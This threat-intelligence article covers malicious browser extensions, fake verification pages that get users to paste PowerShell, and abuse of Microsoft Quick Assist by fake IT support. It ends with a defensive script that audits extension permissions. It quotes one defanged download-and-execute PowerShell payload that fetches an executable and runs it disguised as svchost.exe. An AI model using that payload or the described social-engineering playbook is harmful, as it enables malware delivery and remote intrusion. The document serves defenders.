A new wave of cyberattacks leveraging browser extensions and trusted system tools has emerged as a critical threat to enterprise security.
Over the past six months, threat actors have refined techniques to deliver malware through deceptive browser add-ons and abuse built-in Microsoft utilities like Quick Assist.
These attacks bypass traditional security controls by exploiting user behavior and legitimate software functionalities, creating persistent backdoors even after system remediation efforts.
The malware campaign employs malicious browser extensions, often distributed through compromised Chrome Web Store listings or malvertising redirects.
Once installed, these extensions embed themselves within user profiles, enabling threat actors to steal credentials, session cookies, and sensitive data.
Crucially, the extensions survive system reimaging, as victims frequently reintroduce infected browser profiles during device recovery.
This persistence mechanism ensures repeated reinfection, complicating mitigation efforts.
Ontinue analysts identified that attackers pair these extensions with social engineering tactics to execute malicious PowerShell commands.
In one prevalent malvertising scheme, users are redirected to fake verification pages instructing them to press Windows + R and paste obfuscated PowerShell code.
A typical payload observed in the wild:
Start-BitsTransfer -Source "hxxps://malicious[.]domain/update.exe" -Destination "$env:Temp\svchost.exe"; Start-Process "$env:Temp\svchost.exe"
This script downloads a secondary payload masquerading as a legitimate Windows process, often deploying info-stealers like Lumma or ransomware loaders.
Exploiting Quick Assist for Remote Access
A notable subtopic in these attacks is the abuse of Microsoft’s Quick Assist tool to establish covert remote access.
Quick Assist is a preinstalled Windows application designed for remote troubleshooting; attackers posing as IT support personnel persuade victims to share the six-digit verification code it generates, which is all that is needed to open a session to the victim's machine.
Once granted access, threat actors disable security tools, manipulate registry keys for persistence, and deploy malware.
Ontinue researchers noted that adversaries combine this tactic with “spam bomb” campaigns, where victims receive hundreds of phishing emails to obscure legitimate communications.
Overwhelmed users are then coerced into contacting fake support hotlines, where attackers guide them through enabling Quick Assist sessions.
Post-compromise, adversaries frequently install browser extensions to maintain access or exfiltrate data.
The misuse of Quick Assist highlights a broader trend of weaponizing trusted applications. Unlike third-party remote access tools, Quick Assist is rarely flagged by endpoint detection rules because it is a Microsoft-signed, preinstalled binary.
This grants attackers an operational advantage, as security teams often prioritize monitoring less common remote access software.
Mitigation strategies include disabling Quick Assist via Group Policy in enterprise environments and auditing browser extensions for unauthorized or suspicious permissions.
Ontinue recommends segmenting network zones to limit lateral movement and enforcing strict PowerShell execution policies.
As attackers evolve their abuse of legitimate tools, continuous monitoring and user education remain vital to countering these threats.
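As an added example (not code from the article or from Ontinue), the following PowerShell script supports the extension-auditing recommendation above: it inventories Chrome and Edge extensions across every local user profile and flags permissions that enable credential, cookie and traffic theft, so a browser profile can be reviewed before it is reintroduced onto a rebuilt machine. It assumes default browser install paths and a local administrator running it on the host being triaged; the permission list is a heuristic, not a verdict.

```powershell
# Added example: inventory Chromium-based browser extensions in all local user
# profiles and flag risky permissions. Assumes default Chrome/Edge paths and
# that the script runs with rights to read every profile under C:\Users.
$RiskyPermissions = @('cookies','webRequest','webRequestBlocking','<all_urls>',
                      'tabs','history','clipboardRead','nativeMessaging','debugger')

# Profile roots, relative to each user's AppData\Local.
$BrowserRoots = @{
  'Chrome' = 'Google\Chrome\User Data'
  'Edge'   = 'Microsoft\Edge\User Data'
}

$results = foreach ($userDir in Get-ChildItem 'C:\Users' -Directory) {
  foreach ($browser in $BrowserRoots.Keys) {
    $userData = Join-Path $userDir.FullName "AppData\Local\$($BrowserRoots[$browser])"
    if (-not (Test-Path $userData)) { continue }
    # Each profile (Default, Profile 1, ...) stores extensions as
    # Extensions\<32-char id, letters a-p>\<version>\manifest.json
    $manifests = Get-ChildItem $userData -Recurse -Filter manifest.json -ErrorAction SilentlyContinue |
      Where-Object { $_.FullName -match '\\Extensions\\[a-p]{32}\\' }
    foreach ($m in $manifests) {
      try { $json = Get-Content $m.FullName -Raw | ConvertFrom-Json } catch { continue }
      # Manifest V2 keeps host patterns in "permissions"; V3 moves them to "host_permissions".
      $perms = @($json.permissions) + @($json.host_permissions) | Where-Object { $_ -is [string] }
      $hits  = $perms | Where-Object { $RiskyPermissions -contains $_ }
      [pscustomobject]@{
        User        = $userDir.Name
        Browser     = $browser
        ExtensionId = ($m.FullName -split '\\Extensions\\')[1].Split('\')[0]
        Name        = $json.name   # a '__MSG_*__' value is localized; resolve it via the _locales folder
        Version     = $json.version
        RiskyPerms  = ($hits -join ',')
        ManifestPath = $m.FullName
      }
    }
  }
}

# Riskiest first. Any extension the user or the enterprise did not knowingly install,
# especially one with cookies/webRequest/<all_urls>, should be removed from the profile
# before that profile is restored onto a reimaged device.
$results | Sort-Object { $_.RiskyPerms.Length } -Descending |
  Format-Table User, Browser, ExtensionId, Name, Version, RiskyPerms -AutoSize
```

Extension IDs can be compared against the Chrome Web Store listing to confirm the publisher, and an empty RiskyPerms column does not by itself clear an extension that arrived through a malvertising redirect.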